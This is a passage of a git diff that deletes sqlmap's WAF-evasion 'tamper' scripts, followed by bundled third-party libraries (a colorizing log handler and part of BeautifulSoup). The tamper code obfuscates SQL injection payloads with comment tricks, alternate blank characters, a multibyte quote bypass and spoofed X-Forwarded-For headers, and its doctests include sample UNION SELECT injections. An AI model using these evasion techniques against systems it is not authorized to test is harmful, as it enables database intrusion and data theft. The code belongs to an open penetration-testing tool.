randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "%%23%s%%0A" % randomStr - elif payload[i] == '#' 
or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py deleted file mode 100644 index f55ea596..00000000 --- a/tamper/space2morehash.py +++ /dev/null @@ -1,69 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import random -import string - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Requirement: - * MySQL >= 5.1.13 - - Tested against: - * MySQL 5.1.41 - - Notes: - * Useful to bypass several web application firewalls - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' - """ - - def process(match): - word = match.group('word') - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) - else: - return match.group() - - retVal = "" - - if payload: - payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) - - for i in xrange(len(payload)): - if payload[i].isspace(): - randomStr 
= ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "%%23%s%%0A" % randomStr - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py deleted file mode 100644 index acc0881b..00000000 --- a/tamper/space2mssqlblank.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Requirement: - * Microsoft SQL Server - - Tested against: - * Microsoft SQL Server 2000 - * Microsoft SQL Server 2005 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Eid%0DFROM%07users' - """ - - # ASCII table: - # SOH 01 start of heading - # STX 02 start of text - # ETX 03 end of text - # EOT 04 end of transmission - # ENQ 05 enquiry - # ACK 06 acknowledge - # BEL 07 bell - # BS 08 backspace - # TAB 09 horizontal tab - # LF 0A new line - # VT 0B vertical TAB - # FF 0C new page - # CR 0D carriage return - # SO 0E shift out - # SI 0F shift in - blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace, end = False, False, False, False - - for i in 
xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - end = True - - elif payload[i] == " " and not doublequote and not quote: - if end: - retVal += random.choice(blanks[:-1]) - else: - retVal += random.choice(blanks) - - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py deleted file mode 100644 index 2ea1e537..00000000 --- a/tamper/space2mssqlhash.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') - - Requirement: - * MSSQL - * MySQL - - Notes: - * Useful to bypass several web application firewalls - - >>> tamper('1 AND 9227=9227') - '1%23%0AAND%23%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - retVal += "%23%0A" - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py deleted file mode 100644 index 65c2ef18..00000000 --- a/tamper/space2mysqlblank.py +++ /dev/null @@ -1,71 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - 
-def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Requirement: - * MySQL - - Tested against: - * MySQL 5.1 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Bid%0DFROM%0Cusers' - """ - - # ASCII table: - # TAB 09 horizontal TAB - # LF 0A new line - # FF 0C new page - # CR 0D carriage return - # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - blanks = ('%09', '%0A', '%0C', '%0D', '%0B') - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += random.choice(blanks) - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py deleted file mode 100644 index bebe92a8..00000000 --- a/tamper/space2mysqldash.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a dash 
comment ('--') followed by - a new line ('\n') - - Requirement: - * MySQL - * MSSQL - - Tested against: - - Notes: - * Useful to bypass several web application firewalls. - - >>> tamper('1 AND 9227=9227') - '1--%0AAND--%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - retVal += "--%0A" - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2plus.py b/tamper/space2plus.py deleted file mode 100644 index 2f627cad..00000000 --- a/tamper/space2plus.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with plus ('+') - - Notes: - * Is this any useful? 
The plus get's url-encoded by sqlmap engine - invalidating the query afterwards - * This tamper script works against all databases - - >>> tamper('SELECT id FROM users') - 'SELECT+id+FROM+users' - """ - - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += "+" - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += "+" - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py deleted file mode 100644 index e046501a..00000000 --- a/tamper/space2randomblank.py +++ /dev/null @@ -1,67 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Did%0DFROM%0Ausers' - """ - - # ASCII table: - # TAB 09 horizontal TAB - # LF 0A new line - # FF 0C new page - # CR 0D carriage return - blanks = ("%09", "%0A", "%0C", "%0D") - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = 
not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == ' ' and not doublequote and not quote: - retVal += random.choice(blanks) - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py deleted file mode 100644 index e0c6af27..00000000 --- a/tamper/symboliclogical.py +++ /dev/null @@ -1,30 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) - - >>> tamper("1 AND '1'='1") - "1 %26%26 '1'='1" - """ - - retVal = payload - - if payload: - retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) - - return retVal diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py deleted file mode 100644 index 67062177..00000000 --- a/tamper/unionalltounion.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces UNION ALL SELECT with UNION SELECT - - >>> tamper('-1 UNION ALL SELECT') - '-1 UNION SELECT' - """ - - return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py deleted file mode 100644 index af488772..00000000 --- a/tamper/unmagicquotes.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - 
-from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) - - Notes: - * Useful for bypassing magic_quotes/addslashes feature - - Reference: - * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string - - >>> tamper("1' AND 1=1") - '1%bf%27-- ' - """ - - retVal = payload - - if payload: - found = False - retVal = "" - - for i in xrange(len(payload)): - if payload[i] == '\'' and not found: - retVal += "%bf%27" - found = True - else: - retVal += payload[i] - continue - - if found: - _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) - if _ != retVal: - retVal = _ - retVal += "-- " - elif not any(_ in retVal for _ in ('#', '--', '/*')): - retVal += "-- " - return retVal diff --git a/tamper/uppercase.py b/tamper/uppercase.py deleted file mode 100644 index 5169488f..00000000 --- a/tamper/uppercase.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with upper case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) 
databases - - >>> tamper('insert') - 'INSERT' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - retVal = retVal.replace(word, word.upper()) - - return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py deleted file mode 100644 index 5a3d4e83..00000000 --- a/tamper/varnish.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Append a HTTP header 'X-originating-IP' to bypass - WAF Protection of Varnish Firewall - - Notes: - Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 - - Examples: - >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) - >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) - >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1) - >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X) - >> X-remote-IP: * or %00 or %0A - """ - - headers = kwargs.get("headers", {}) - headers["X-originating-IP"] = "127.0.0.1" - return payload diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py deleted file mode 100644 index a624b306..00000000 --- a/tamper/versionedkeywords.py +++ /dev/null @@ -1,52 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % 
(os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Encloses each non-function keyword with versioned MySQL comment - - Requirement: - * MySQL - - Tested against: - * MySQL 4.0.18, 5.1.56, 5.5.11 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') - '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords: - return match.group().replace(word, "/*!%s*/" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") - - return retVal diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py deleted file mode 100644 index 95f0c2d0..00000000 --- a/tamper/versionedmorekeywords.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Encloses each keyword with versioned MySQL comment - - Requirement: - * MySQL >= 5.1.13 - - 
Tested against: - * MySQL 5.1.56, 5.5.11 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') - '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "/*!%s*/" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") - - return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py deleted file mode 100644 index 47a99cd5..00000000 --- a/tamper/xforwardedfor.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY -from random import sample -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def randomIP(): - numbers = [] - while not numbers or numbers[0] in (10, 172, 192): - numbers = sample(xrange(1, 255), 4) - return '.'.join(str(_) for _ in numbers) - -def tamper(payload, **kwargs): - """ - Append a fake HTTP header 'X-Forwarded-For' to bypass - WAF (usually application based) protection - """ - - headers = kwargs.get("headers", {}) - headers["X-Forwarded-For"] = randomIP() - return payload diff --git a/thirdparty/__init__.py b/thirdparty/__init__.py deleted file mode 100644 index e69de29b..00000000 diff --git a/thirdparty/ansistrm/__init__.py 
b/thirdparty/ansistrm/__init__.py deleted file mode 100644 index e69de29b..00000000 diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py deleted file mode 100644 index 9f3a6c5e..00000000 --- a/thirdparty/ansistrm/ansistrm.py +++ /dev/null @@ -1,158 +0,0 @@ -# -# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. -# -import logging -import os -import re -import subprocess -import sys - -from lib.core.convert import stdoutencode - -if subprocess.mswindows: - import ctypes - import ctypes.wintypes - - # Reference: https://gist.github.com/vsajip/758430 - # https://github.com/ipython/ipython/issues/4252 - # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx - ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] - ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL - - -class ColorizingStreamHandler(logging.StreamHandler): - # color names to indices - color_map = { - 'black': 0, - 'red': 1, - 'green': 2, - 'yellow': 3, - 'blue': 4, - 'magenta': 5, - 'cyan': 6, - 'white': 7, - } - - # levels to (background, foreground, bold/intense) - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - csi = '\x1b[' - reset = '\x1b[0m' - disable_coloring = False - - @property - def is_tty(self): - isatty = getattr(self.stream, 'isatty', None) - return isatty and isatty() and not self.disable_coloring - - def emit(self, record): - try: - message = stdoutencode(self.format(record)) - stream = self.stream - - if not self.is_tty: - if message and message[0] == "\r": - message = message[1:] - stream.write(message) - else: - self.output_colorized(message) - stream.write(getattr(self, 'terminator', '\n')) - - self.flush() - except 
(KeyboardInterrupt, SystemExit): - raise - except IOError: - pass - except: - self.handleError(record) - - if not subprocess.mswindows: - def output_colorized(self, message): - self.stream.write(message) - else: - ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m') - - nt_color_map = { - 0: 0x00, # black - 1: 0x04, # red - 2: 0x02, # green - 3: 0x06, # yellow - 4: 0x01, # blue - 5: 0x05, # magenta - 6: 0x03, # cyan - 7: 0x07, # white - } - - def output_colorized(self, message): - parts = self.ansi_esc.split(message) - write = self.stream.write - h = None - fd = getattr(self.stream, 'fileno', None) - - if fd is not None: - fd = fd() - - if fd in (1, 2): # stdout or stderr - h = ctypes.windll.kernel32.GetStdHandle(-10 - fd) - - while parts: - text = parts.pop(0) - - if text: - write(text) - - if parts: - params = parts.pop(0) - - if h is not None: - params = [int(p) for p in params.split(';')] - color = 0 - - for p in params: - if 40 <= p <= 47: - color |= self.nt_color_map[p - 40] << 4 - elif 30 <= p <= 37: - color |= self.nt_color_map[p - 30] - elif p == 1: - color |= 0x08 # foreground intensity on - elif p == 0: # reset to default color - color = 0x07 - else: - pass # error condition ignored - - ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] - params = [] - - if bg in self.color_map: - params.append(str(self.color_map[bg] + 40)) - - if fg in self.color_map: - params.append(str(self.color_map[fg] + 30)) - - if bold: - params.append('1') - - if params and message: - if message.lstrip() != message: - prefix = re.search(r"\s+", message).group(0) - message = message[len(prefix):] - else: - prefix = "" - - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), - 'm', message, self.reset))) - - return message - - def format(self, record): - message = logging.StreamHandler.format(self, record) - return 
self.colorize(message, record) diff --git a/thirdparty/beautifulsoup/__init__.py b/thirdparty/beautifulsoup/__init__.py deleted file mode 100644 index 7954a3d0..00000000 --- a/thirdparty/beautifulsoup/__init__.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -# -# Copyright (c) 2004-2010, Leonard Richardson -# -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are -# met: -# -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# -# * Redistributions in binary form must reproduce the above -# copyright notice, this list of conditions and the following -# disclaimer in the documentation and/or other materials provided -# with the distribution. -# -# * Neither the name of the the Beautiful Soup Consortium and All -# Night Kosher Bakery nor the names of its contributors may be -# used to endorse or promote products derived from this software -# without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, -# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, -# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. 
-# - -pass diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py deleted file mode 100644 index 69d3752c..00000000 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ /dev/null @@ -1,2017 +0,0 @@ -"""Beautiful Soup -Elixir and Tonic -"The Screen-Scraper's Friend" -http://www.crummy.com/software/BeautifulSoup/ - -Beautiful Soup parses a (possibly invalid) XML or HTML document into a -tree representation. It provides methods and Pythonic idioms that make -it easy to navigate, search, and modify the tree. - -A well-formed XML/HTML document yields a well-formed data -structure. An ill-formed XML/HTML document yields a correspondingly -ill-formed data structure. If your document is only locally -well-formed, you can use this library to find and process the -well-formed part of it. - -Beautiful Soup works with Python 2.2 and up. It has no external -dependencies, but you'll have more success at converting data to UTF-8 -if you also install these three packages: - -* chardet, for auto-detecting character encodings - http://chardet.feedparser.org/ -* cjkcodecs and iconv_codec, which add more encodings to the ones supported - by stock Python. - http://cjkpython.i18n.org/ - -Beautiful Soup defines classes for two main parsing strategies: - - * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific - language that kind of looks like XML. - - * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid - or invalid. This class has web browser-like heuristics for - obtaining a sensible parse tree in the face of common HTML errors. - -Beautiful Soup also defines a class (UnicodeDammit) for autodetecting -the encoding of an HTML or XML document, and converting it to -Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. 
- -For more than you ever wanted to know about Beautiful Soup, see the -documentation: -http://www.crummy.com/software/BeautifulSoup/documentation.html - -Here, have some legalese: - -Copyright (c) 2004-2010, Leonard Richardson - -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - - * Redistributions in binary form must reproduce the above - copyright notice, this list of conditions and the following - disclaimer in the documentation and/or other materials provided - with the distribution. - - * Neither the name of the the Beautiful Soup Consortium and All - Night Kosher Bakery nor the names of its contributors may be - used to endorse or promote products derived from this software - without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, -EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, -PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. 
- -""" -from __future__ import generators - -__author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.1" -__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" -__license__ = "New-style BSD" - -from sgmllib import SGMLParser, SGMLParseError -import codecs -import markupbase -import types -import re -import sgmllib -try: - from htmlentitydefs import name2codepoint -except ImportError: - name2codepoint = {} -try: - set -except NameError: - from sets import Set as set - -#These hacks make Beautiful Soup able to parse XML with namespaces -sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') -markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match - -DEFAULT_OUTPUT_ENCODING = "utf-8" - -def _match_css_class(str): - """Build a RE to match the given CSS class.""" - return re.compile(r"(^|.*\s)%s($|\s)" % str) - -# First, the classes that represent markup elements. - -class PageElement(object): - """Contains the navigational information for some part of the page - (either a tag or a piece of text)""" - - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - - def setup(self, parent=None, previous=None): - """Sets up the initial relations between this element and - other elements.""" - self.parent = parent - self.previous = previous - self.next = None - self.previousSibling = None - 